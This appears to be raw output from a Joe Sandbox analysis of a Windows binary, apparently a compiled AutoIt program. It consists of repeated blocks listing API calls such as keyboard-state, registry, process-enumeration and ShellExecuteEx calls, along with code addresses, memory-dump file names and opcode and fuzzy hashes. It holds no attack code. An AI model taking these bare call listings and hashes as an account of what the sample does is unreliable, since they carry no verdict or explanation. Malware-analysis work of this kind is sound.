                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • __mtinitlocknum.LIBCMT ref: 0078B744
                                                                                                                                          • Part of subcall function 00788A0C: __FF_MSGBANNER.LIBCMT ref: 00788A21
                                                                                                                                          • Part of subcall function 00788A0C: __NMSG_WRITE.LIBCMT ref: 00788A28
                                                                                                                                          • Part of subcall function 00788A0C: __malloc_crt.LIBCMT ref: 00788A48
                                                                                                                                        • __lock.LIBCMT ref: 0078B757
                                                                                                                                        • __lock.LIBCMT ref: 0078B7A3
                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00816948,00000018,00796C2B,?,00000000,00000109), ref: 0078B7BF
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0078B7DC
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0078B7EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1422805418-0
                                                                                                                                        • Opcode ID: 68452cca4f9bcba2e7a37cf54fafb0793505decbae4b27229718ce4016a0f549
                                                                                                                                        • Instruction ID: 834702eb580d4476a7e351d613f233ac4fe7a141fae2366508325359daadaef0
                                                                                                                                        • Opcode Fuzzy Hash: 68452cca4f9bcba2e7a37cf54fafb0793505decbae4b27229718ce4016a0f549
                                                                                                                                        • Instruction Fuzzy Hash: 6241F471980315DBEB20BF68D88836CBBA4BF45335F248219E425AB2D2D77C9941CBD5
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 007AA1CE
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007AA205
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007AA221
                                                                                                                                        • _memmove.LIBCMT ref: 007AA26F
                                                                                                                                        • _memmove.LIBCMT ref: 007AA28C
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007AA29B
                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007AA2B0
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 007AA2CF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 256516436-0
                                                                                                                                        • Opcode ID: 66238d1fcaa62e508b1ea9c252ec9962bf881fddbe0cde56b13165514df56afb
                                                                                                                                        • Instruction ID: bb9f8493407fa0c60157551f304a56496d33659bc674abea23086af40974174c
                                                                                                                                        • Opcode Fuzzy Hash: 66238d1fcaa62e508b1ea9c252ec9962bf881fddbe0cde56b13165514df56afb
                                                                                                                                        • Instruction Fuzzy Hash: D2319431900105EBDF10EFA4DC89AAEB7B8FF89310B1580A5F904AB256DB79DD14CBA5
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007C8CF3
                                                                                                                                        • GetDC.USER32(00000000), ref: 007C8CFB
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C8D06
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 007C8D12
                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 007C8D4E
                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007C8D5F
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007C8D99
                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007C8DB9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                        • Opcode ID: 060c495749dc21004976dc285cda0831d15057b2c13397c7152846ec0c78bb0e
                                                                                                                                        • Instruction ID: 27d62bfe396c547dc0bcf32bb1d69e6980bd65ce42e1d43becc2f9cc10abbc8c
                                                                                                                                        • Opcode Fuzzy Hash: 060c495749dc21004976dc285cda0831d15057b2c13397c7152846ec0c78bb0e
                                                                                                                                        • Instruction Fuzzy Hash: D3315C72201254BBEB208F508C89FEA3BA9EB4D755F048059FE099E291DA799C41CB75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8cad561eabaa14e4701a9b4d8d2597b0bd227f97ff70f9080c38182af6b6f1ed
                                                                                                                                        • Instruction ID: abb5cf7b25a164fba86bbe730ade07327afe8f7d57486f200c38deeba0f19c5f
                                                                                                                                        • Opcode Fuzzy Hash: 8cad561eabaa14e4701a9b4d8d2597b0bd227f97ff70f9080c38182af6b6f1ed
                                                                                                                                        • Instruction Fuzzy Hash: 4A713871900149EFCF14CF98CC88ABEBB74FF89354F14C159F919AA251C738AA51CBA4
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007C214B
                                                                                                                                        • _memset.LIBCMT ref: 007C2214
                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 007C2259
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                          • Part of subcall function 00763BCF: _wcscpy.LIBCMT ref: 00763BF2
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007C2320
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 007C232F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 4082843840-2766056989
                                                                                                                                        • Opcode ID: 04ed053c30a23e249b1176e4dfa3912d60f98e0c57a5c39af3d70b4bf6b0c824
                                                                                                                                        • Instruction ID: f612550a89ef17d3a416cc962f8fb1bf20432ea6b33b9c44e0906682919ec291
                                                                                                                                        • Opcode Fuzzy Hash: 04ed053c30a23e249b1176e4dfa3912d60f98e0c57a5c39af3d70b4bf6b0c824
                                                                                                                                        • Instruction Fuzzy Hash: DD716D75A00619DFCF14EFA4C885AAEBBF5FF48310B10855DE856AB352DB38AD41CB90
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 007A481D
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 007A4832
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 007A4893
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 007A48C1
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 007A48E0
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 007A4926
                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007A4949
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: e21f79c208c071d3f2f26fd28a30f08f516037d2817fbbf87a4f17ede11e44fa
                                                                                                                                        • Instruction ID: 774499a36d5fb5050a619178a94135842c7bed86301f3422a0673a67be73cb3e
                                                                                                                                        • Opcode Fuzzy Hash: e21f79c208c071d3f2f26fd28a30f08f516037d2817fbbf87a4f17ede11e44fa
                                                                                                                                        • Instruction Fuzzy Hash: 1C51E4A06087D13DFB3647348C49BBBBEA95BC7304F088689E1D5468C2C6DEEC94DB61
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(00000000), ref: 007A4638
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 007A464D
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 007A46AE
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007A46DA
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007A46F7
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007A473B
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007A475C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2945705084-0
                                                                                                                                        APIs
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 007C3C92
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C3CBC
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 007C3D71
                                                                                                                                          • Part of subcall function 007C3C63: RegCloseKey.ADVAPI32(?), ref: 007C3CD9
                                                                                                                                          • Part of subcall function 007C3C63: FreeLibrary.KERNEL32(?), ref: 007C3D2B
                                                                                                                                          • Part of subcall function 007C3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007C3D4E
                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 007C3D16
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 395352322-0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007C8DF4
                                                                                                                                        • GetWindowLongW.USER32(0118A910,000000F0), ref: 007C8E27
                                                                                                                                        • GetWindowLongW.USER32(0118A910,000000F0), ref: 007C8E5C
                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007C8E8E
                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007C8EB8
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007C8EC9
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C8EE3
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A1734
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A175A
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007A175D
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 007A177B
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007A1784
                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007A17A9
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 007A17B7
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007631DA
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 007A6A2B
                                                                                                                                        • _wcscmp.LIBCMT ref: 007A6A49
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 007A6A62
                                                                                                                                          • Part of subcall function 007A6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 007A6DBA
                                                                                                                                          • Part of subcall function 007A6D6D: GetLastError.KERNEL32 ref: 007A6DC5
                                                                                                                                          • Part of subcall function 007A6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 007A6DD9
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6AA4
                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 007A6B0C
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 2323102230-1173974218
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                                        • Opcode ID: 13df1d566e3429b6a6542f351cbf552bb3c3ce08ebe470168b6b61962e9a0387
                                                                                                                                        • Instruction ID: 4c2328f6e21a9a85dfbd71562e206525f23d55a8f3ad630a6db15874695aa514
                                                                                                                                        • Opcode Fuzzy Hash: 13df1d566e3429b6a6542f351cbf552bb3c3ce08ebe470168b6b61962e9a0387
                                                                                                                                        • Instruction Fuzzy Hash: B9216E72144515BFC231BB349C0AEBB73E99F97351F104225F58587182EB9D9E83D3A0
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A180D
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A1833
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007A1836
                                                                                                                                        • SysAllocString.OLEAUT32 ref: 007A1857
                                                                                                                                        • SysFreeString.OLEAUT32 ref: 007A1860
                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007A187A
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 007A1888
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                        • Opcode ID: aa7782330c8a18ffa57a6a240818509cf5878c8f5a54b7c8aa61829c3d497c56
                                                                                                                                        • Instruction ID: daeb38445a5e5390da85b014ed5c401e55eddb6a9b5dcce43a9ac3d34dfce041
                                                                                                                                        • Opcode Fuzzy Hash: aa7782330c8a18ffa57a6a240818509cf5878c8f5a54b7c8aa61829c3d497c56
                                                                                                                                        • Instruction Fuzzy Hash: 2F214775601114AFAB109BE8CC89DBE77ECEB4E370B808225F915DF2A0D678EC418764
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077C657
                                                                                                                                          • Part of subcall function 0077C619: GetStockObject.GDI32(00000011), ref: 0077C66B
                                                                                                                                          • Part of subcall function 0077C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077C675
                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007CA13B
                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007CA148
                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007CA153
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007CA162
                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007CA16E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                        • Opcode ID: 9518499f45835af8eb1ea9e3ab8d2a55d36a4dacf2a300a468becdaf389dd3da
                                                                                                                                        • Instruction ID: bd4c7d4c3092850250546a6244c057e65419e421365e21832874ba6747fdc2e3
                                                                                                                                        • Opcode Fuzzy Hash: 9518499f45835af8eb1ea9e3ab8d2a55d36a4dacf2a300a468becdaf389dd3da
                                                                                                                                        • Instruction Fuzzy Hash: D31182B115021DBFEF115F65CC86EE77F6DEF08798F118219FA08A6090C6769C21DBA4
                                                                                                                                        APIs
                                                                                                                                        • __getptd_noexit.LIBCMT ref: 00784C3E
                                                                                                                                          • Part of subcall function 007886B5: GetLastError.KERNEL32(?,00780127,007888A3,00784673,?,?,00780127,?,0076125D,00000058,?,?), ref: 007886B7
                                                                                                                                          • Part of subcall function 007886B5: __calloc_crt.LIBCMT ref: 007886D8
                                                                                                                                          • Part of subcall function 007886B5: GetCurrentThreadId.KERNEL32 ref: 00788701
                                                                                                                                          • Part of subcall function 007886B5: SetLastError.KERNEL32(00000000,00780127,007888A3,00784673,?,?,00780127,?,0076125D,00000058,?,?), ref: 00788719
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00784C1D), ref: 00784C52
                                                                                                                                        • __freeptd.LIBCMT ref: 00784C59
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,00784C1D), ref: 00784C61
                                                                                                                                        • GetLastError.KERNEL32(?,?,00784C1D), ref: 00784C91
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,?,00784C1D), ref: 00784C98
                                                                                                                                        • __freefls@4.LIBCMT ref: 00784CB4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1445074172-0
                                                                                                                                        • Opcode ID: c69bc038da4469c7cdaead2b7f215ef88eb54fd0af382dbf2f1bea333a712bdb
                                                                                                                                        • Instruction ID: 1ff3aa1ff9c80b0e9264d12f244f410a9dc29b456b6fc8350feaaad76889d2ee
                                                                                                                                        • Opcode Fuzzy Hash: c69bc038da4469c7cdaead2b7f215ef88eb54fd0af382dbf2f1bea333a712bdb
                                                                                                                                        • Instruction Fuzzy Hash: 5B01BCB0542642EBC768BBA4D94D9097BA9BF083147108518F518CB652EF3DDC428BA2
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0077C6C0
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0077C701
                                                                                                                                        • ScreenToClient.USER32(?,000000FF), ref: 0077C729
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0077C856
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0077C86F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                        • Opcode ID: acf32468aedc2a95f9064bc11f0adf898cf1cec17ded165a6b8d34ba44e257a0
                                                                                                                                        • Instruction ID: d6d8ca36bb61346e3b7be691c7a882b05fac6c39f0abdbe71509ea7d5cc598ee
                                                                                                                                        • Opcode Fuzzy Hash: acf32468aedc2a95f9064bc11f0adf898cf1cec17ded165a6b8d34ba44e257a0
                                                                                                                                        • Instruction Fuzzy Hash: B4B14539A00249DBDF15CFA8C4807EDB7B1FF08340F14D52AEC59AB254EB38AA40CB65
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3253778849-0
                                                                                                                                        • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                        • Instruction ID: 304023f3941bfa40323994a042602852fff117905d4efec4aeceeb25fd1605ef
                                                                                                                                        • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                        • Instruction Fuzzy Hash: 0161BE3090025ADBCF05EF64CD8AEFE37A4AF86314F048654FD5A6B192DB389D15CBA1
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 007C1B09
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 007C1B17
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007C1B45
                                                                                                                                          • Part of subcall function 0078297D: __wsplitpath_helper.LIBCMT ref: 007829BD
                                                                                                                                        • _wcscat.LIBCMT ref: 007C1B5A
                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 007C1BD0
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 007C1BE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1380811348-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 007C3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C2FA0
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C2FE0
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007C3003
                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007C302C
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007C306F
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C307C
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4046560759-0
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2037614760-0
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007A2AF6
                                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 007A2B68
                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 007A2BC3
                                                                                                                                        • _memmove.LIBCMT ref: 007A2BED
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007A2C3A
                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007A2C68
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1101466143-0
                                                                                                                                        APIs
                                                                                                                                        • GetMenu.USER32(?), ref: 007C833D
                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 007C8374
                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007C839C
                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 007C840B
                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 007C8419
                                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 007C846A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 650687236-0
                                                                                                                                        APIs
                                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 007B9409
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9416
                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 007B943A
                                                                                                                                        • _strlen.LIBCMT ref: 007B9484
                                                                                                                                        • _memmove.LIBCMT ref: 007B94CA
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B94F7
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2795762555-0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A552E
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A5579
                                                                                                                                        • IsMenu.USER32(00000000), ref: 007A5599
                                                                                                                                        • CreatePopupMenu.USER32 ref: 007A55CD
                                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 007A562B
